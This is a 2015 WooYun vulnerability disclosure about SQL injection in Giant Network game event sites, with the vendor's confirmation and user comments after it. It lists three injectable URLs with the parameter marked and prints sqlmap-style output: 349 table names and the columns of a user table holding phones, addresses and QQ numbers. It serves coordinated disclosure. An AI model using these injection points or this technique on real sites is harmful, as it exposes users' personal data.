当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116607

漏洞标题:游戏行业安全之巨人网络多站存在多个SQL注入点(貌似存在通用性\涉及至少数百万用户信息\包括大量第三方用户信息)

相关厂商:巨人网络

漏洞作者: 管管侠

提交时间:2015-05-27 23:12

修复时间:2015-07-13 09:16

公开时间:2015-07-13 09:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-05-29: 厂商已经确认,细节仅向厂商公开
2015-06-08: 细节向核心白帽子及相关领域专家公开
2015-06-18: 细节向普通白帽子公开
2015-06-28: 细节向实习白帽子公开
2015-07-13: 细节向公众公开

简要描述:

建议厂商看完漏洞,确认一下,然后留言让审核打下码,不建议总忽略漏洞,好的吧!
注:合作第三方的用户表那么多

详细说明:

多处SQL注入
这两个同库:
http://tieba.xx.ztgame.com/index.php?mod=bbs&kw=1*&page=10&act=list
http://act.xx.ztgame.com/bbs/index.php?mod=bbs&act=list&kw=1*

1.png


下面这个单独库:
http://act.xzt.ztgame.com/lwj/index.php?mod=clan&act=zdlist&kw=1*

2.png

漏洞证明:

Database: act_xx
[349 tables]
+-----------------------------------+
| 7v_list |
| act_user |
| act_user_login_log |
| act_user_phone_log |
| act_user_score_log |
| active_log |
| app_config |
| app_device_user |
| app_http_log |
| app_ios_token |
| app_login_user |
| app_phone_bind_log |
| app_prize |
| app_prize_weibo_log |
| app_push_ios_log |
| app_push_log |
| article |
| bag_bonus_log |
| bag_bonus_log_v2 |
| bag_item |
| bag_item_v2 |
| bag_key |
| bag_member_address |
| bag_member_address_v2 |
| bag_v3_bonus_log |
| bag_v3_item |
| bag_v3_key |
| bag_v3_member_address |
| bag_v3_vote_chance |
| bag_vote_chance |
| bag_vote_chance_v2 |
| basicdata |
| bbs_forum |
| bbs_forum_post |
| bbs_log |
| bbs_member |
| bbs_member_action |
| bbs_member_blacklist |
| bbs_member_bonus |
| bbs_member_credit |
| bbs_member_message |
| bbs_member_message_del |
| bylot_log |
| catalogue |
| chief_code |
| chief_user |
| christmas_award |
| christmas_box_log |
| christmas_log |
| christmas_star_log |
| christmas_user |
| cjddp_award |
| cjddp_code |
| cjddp_user |
| cjddp_wlog |
| customfields |
| datapool |
| dazp_award |
| dazp_user |
| dazp_wlog |
| dbt_star |
| ddp_award |
| ddp_code |
| ddp_setting |
| ddp_slog |
| ddp_user |
| ddp_wlog |
| diaosi_phone |
| dp_logs |
| dp_msg |
| dp_point |
| dp_province |
| dp_record |
| dsapp_log |
| dsjj_file |
| dsjj_log |
| dsjj_star |
| duanwu_award |
| duanwu_log |
| duanwu_user |
| euro |
| euro_history |
| gohome_award |
| gohome_card_log |
| gohome_log |
| gohome_user |
| gowall_user |
| handbook |
| lvmama_user |
| lvmama_user_img |
| lvmama_vote_chance |
| lvmama_vote_log |
| lwj_login_log |
| maidan_card |
| maidan_chance |
| maidan_index_count |
| maidan_log |
| maidan_user |
| maidan_v3_bonus_log |
| maidan_v3_item |
| maidan_v3_key |
| maidan_v3_key_jd |
| maidan_v3_user |
| maidan_v4_bonus_log |
| maidan_v4_item |
| maidan_v4_key |
| maidan_v4_key_jd |
| maidan_v4_user |
| mmanchor_comment |
| mmanchor_list |
| mmanchor_log |
| mmshow_list |
| mmshow_log |
| mmshow_v10_list |
| mmshow_v2_list |
| mmshow_v2_log |
| mmshow_v3_list |
| mmshow_v3_log |
| mmshow_v4_list |
| mmshow_v4_log |
| mmshow_v5_list |
| mmshow_v6_list |
| mmshow_v7_list |
| mmshow_v7_log |
| mmshow_v8_list |
| mmshow_v9_list |
| mmvote_user |
| phone_20140619 |
| pk_login_log |
| pk_news |
| pk_say |
| pk_section |
| pkvote_info |
| pkvote_user |
| reg_phone |
| reg_sns |
| reward_award |
| reward_list |
| shaitu_list |
| shaitu_wlog |
| shengxiao_award |
| shengxiao_award_20131218 |
| shengxiao_log |
| shengxiao_log_20131218 |
| shengxiao_log_temp |
| shengxiao_log_temp_2 |
| snl_award |
| snl_code |
| snl_log |
| snl_star |
| sqserver_user |
| suggest |
| suggest_comment |
| suggest_user |
| talent_bonus_log |
| talent_items |
| talent_login_log |
| talent_user |
| talent_vote_chance |
| talent_vote_log |
| team_award |
| team_award_20130729 |
| team_award_20130805 |
| team_award_20130813 |
| team_collect_award |
| team_collect_award_20130729 |
| team_collect_award_20130805 |
| team_collect_award_20130813 |
| team_collect_log |
| team_collect_log_20130729 |
| team_collect_log_20130805 |
| team_collect_log_20130813 |
| team_collect_user |
| team_collect_user_20130729 |
| team_collect_user_20130805 |
| team_collect_user_20130813 |
| team_comment |
| team_comment_20130729 |
| team_comment_20130805 |
| team_comment_20130813 |
| team_error |
| team_error_20130729 |
| team_error_20130805 |
| team_error_20130813 |
| team_game_phone |
| team_game_phone_20130729 |
| team_game_phone_20130805 |
| team_game_phone_20130813 |
| team_list |
| team_list_20130729 |
| team_list_20130805 |
| team_list_20130813 |
| team_log |
| team_log_20130729 |
| team_log_20130805 |
| team_log_20130813 |
| team_member |
| team_member_20130729 |
| team_member_20130805 |
| team_member_20130813 |
| team_phone |
| team_phone_20130729 |
| team_phone_20130805 |
| team_phone_20130813 |
| team_user |
| team_user_20130729 |
| team_user_20130805 |
| team_user_20130813 |
| team_v2_phone |
| team_v2_phone_20130909 |
| team_v2_phone_20130922 |
| team_v2_phone_20131012 |
| team_v2_phone_20131028 |
| team_v2_phone_20131108 |
| team_v2_phone_20131209 |
| team_v2_phone_20131223 |
| team_v2_phone_20140103 |
| team_v2_phone_20140120 |
| team_v2_phone_20140214 |
| team_v2_phone_20140303 |
| team_v2_phone_20140318 |
| team_v2_phone_20140401 |
| team_v2_phone_20140414 |
| team_v2_phone_20140428 |
| team_v2_phone_20140512 |
| team_v2_team_list |
| team_v2_team_list_20130909 |
| team_v2_team_list_20130922 |
| team_v2_team_list_20131012 |
| team_v2_team_list_20131028 |
| team_v2_team_list_20131108 |
| team_v2_team_list_20131209 |
| team_v2_team_list_20131223 |
| team_v2_team_list_20140103 |
| team_v2_team_list_20140120 |
| team_v2_team_list_20140214 |
| team_v2_team_list_20140303 |
| team_v2_team_list_20140318 |
| team_v2_team_list_20140401 |
| team_v2_team_list_20140414 |
| team_v2_team_list_20140428 |
| team_v2_team_list_20140512 |
| team_v2_team_member_list |
| team_v2_team_member_list_20130909 |
| team_v2_team_member_list_20130922 |
| team_v2_team_member_list_20131012 |
| team_v2_team_member_list_20131028 |
| team_v2_team_member_list_20131108 |
| team_v2_team_member_list_20131209 |
| team_v2_team_member_list_20131223 |
| team_v2_team_member_list_20140103 |
| team_v2_team_member_list_20140120 |
| team_v2_team_member_list_20140214 |
| team_v2_team_member_list_20140303 |
| team_v2_team_member_list_20140318 |
| team_v2_team_member_list_20140401 |
| team_v2_team_member_list_20140414 |
| team_v2_team_member_list_20140428 |
| team_v2_team_member_list_20140512 |
| team_v2_team_token_list |
| team_v2_team_token_list_20130909 |
| team_v2_team_token_list_20130922 |
| team_v2_team_token_list_20131012 |
| team_v2_team_token_list_20131028 |
| team_v2_team_token_list_20131108 |
| team_v2_team_token_list_20131209 |
| team_v2_team_token_list_20131223 |
| team_v2_team_token_list_20140103 |
| team_v2_team_token_list_20140120 |
| team_v2_team_token_list_20140214 |
| team_v2_team_token_list_20140303 |
| team_v2_team_token_list_20140318 |
| team_v2_team_token_list_20140401 |
| team_v2_team_token_list_20140414 |
| team_v2_team_token_list_20140428 |
| team_v2_team_token_list_20140512 |
| team_v2_team_user_list |
| team_v2_team_user_list_20130909 |
| team_v2_team_user_list_20130922 |
| team_v2_team_user_list_20131012 |
| team_v2_team_user_list_20131028 |
| team_v2_team_user_list_20131108 |
| team_v2_team_user_list_20131209 |
| team_v2_team_user_list_20131223 |
| team_v2_team_user_list_20140103 |
| team_v2_team_user_list_20140120 |
| team_v2_team_user_list_20140214 |
| team_v2_team_user_list_20140303 |
| team_v2_team_user_list_20140318 |
| team_v2_team_user_list_20140401 |
| team_v2_team_user_list_20140414 |
| team_v2_team_user_list_20140428 |
| team_v2_team_user_list_20140512 |
| team_v2_weibo_log |
| team_v2_weibo_log_20130909 |
| team_v2_weibo_log_20130922 |
| team_v2_weibo_log_20131012 |
| team_v2_weibo_log_20131028 |
| team_v2_weibo_log_20131108 |
| team_v2_weibo_log_20131209 |
| team_v2_weibo_log_20131223 |
| team_v2_weibo_log_20140103 |
| team_v2_weibo_log_20140120 |
| team_v2_weibo_log_20140214 |
| team_v2_weibo_log_20140303 |
| team_v2_weibo_log_20140318 |
| team_v2_weibo_log_20140401 |
| team_v2_weibo_log_20140414 |
| team_v2_weibo_log_20140428 |
| team_v2_weibo_log_20140512 |
| team_v3_login_log |
| team_v3_phone |
| team_v3_phone_new |
| team_v3_prize |
| toughguy_apply |
| treasure_code |
| treasure_log |
| treasure_user |
| treasure_wlog |
| tzh_list |
| tzh_log |
| upload |
| v8_reg_log |
| vocation_vote |
| wish_code |
| wish_log |
| wish_user |
| wish_wlog |
| xgdd_users |
| xx_api_log |
| xx_yidong |
| ydteam_award |
| ydteam_collect_award |
| ydteam_collect_log |
| ydteam_comment |
| ydteam_error |
| ydteam_game_phone |
| ydteam_list |
| ydteam_log |
| ydteam_member |
| ydteam_phone |
| ydteam_user |
| yuanxiao_award |
| yuanxiao_log |
| yuanxiao_user |
| zp_code |
| zp_user |
| zp_useraward |
| zp_userchancelog |
+-----------------------------------+
Database: act_xx
Table: act_user
[13 columns]
+----------+---------------------+
| Column | Type |
+----------+---------------------+
| accid | int(11) unsigned |
| account | varchar(50) |
| address | varchar(255) |
| birth | int(10) unsigned |
| cdate | date |
| city | int(5) unsigned |
| id | int(11) unsigned |
| ldate | date |
| phone | int(11) unsigned |
| province | int(2) unsigned |
| qq | varchar(12) |
| score | int(10) unsigned |
| sex | tinyint(1) unsigned |
+----------+---------------------+

3.png


仅act_user就167W+的用户详细信息,其他user表就不一一读取了,证明危害

修复方案:

不确认却偷偷修漏洞的厂商被称为“无良厂商”
建议通查使用该系统的业务,应该存在通用性

版权声明:转载请注明来源 管管侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-05-29 09:14

厂商回复:

这个漏洞已确认,正在评估修补总

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-27 23:55 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    这标题够长

  2. 2015-05-28 01:31 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    够霸气!!

  3. 2015-05-28 02:01 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @mango 大牛你也来一发啊,哈哈

  4. 2015-05-28 10:37 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @小龙 = = 看这这全部忽略。。。就有点蛋疼

  5. 2015-05-28 11:53 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    我是洞主,这个漏洞厂商如果看完不确认,手里他家的漏洞就不提交了,呵呵

  6. 2015-05-29 09:55 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    至少3个注入点,就给5分,还不如忽略呢,教我如何提交你们剩下的漏洞

  7. 2015-05-31 10:28 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    说好的旅游业安全呢 @管管侠

  8. 2015-06-01 10:37 | 巨人网络(乌云厂商)

    @管管侠 非常感谢您的及时反馈,我们对此非常重视。但由于上周打分的同事,不是特别懂Rank的重要意义,所以没有客观的给予评价,我们对此感到愧疚。如果后续还有机会收到您的反馈,我们肯定给予高分。

  9. 2015-06-01 10:44 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)
  10. 2015-07-13 09:41 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @管管侠 非常感谢您的及时反馈,我们对此非常重视。但由于上周打分的同事,不是特别懂Rank的重要意义,所以没有客观的给予评价,我们对此感到愧疚。如果后续还有机会收到您的反馈,我们肯定继续给予低分。

  11. 2015-07-13 12:53 | 盛大网络(乌云厂商)

    感觉要来了

  12. 2015-07-13 16:21 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    @盛大网络 你感觉到了什么- -

  13. 2015-07-14 00:26 | 黑暗游侠 ( 普通白帽子 | Rank:1780 漏洞数:268 | 123)

    @管管侠 非常感谢您的及时反馈,我们对此非常重视。但由于上周打分的同事,不是特别懂Rank的重要意义,所以没有客观的给予评价,我们对此感到愧疚。如果后续还有机会收到您的反馈,我们肯定给予高分。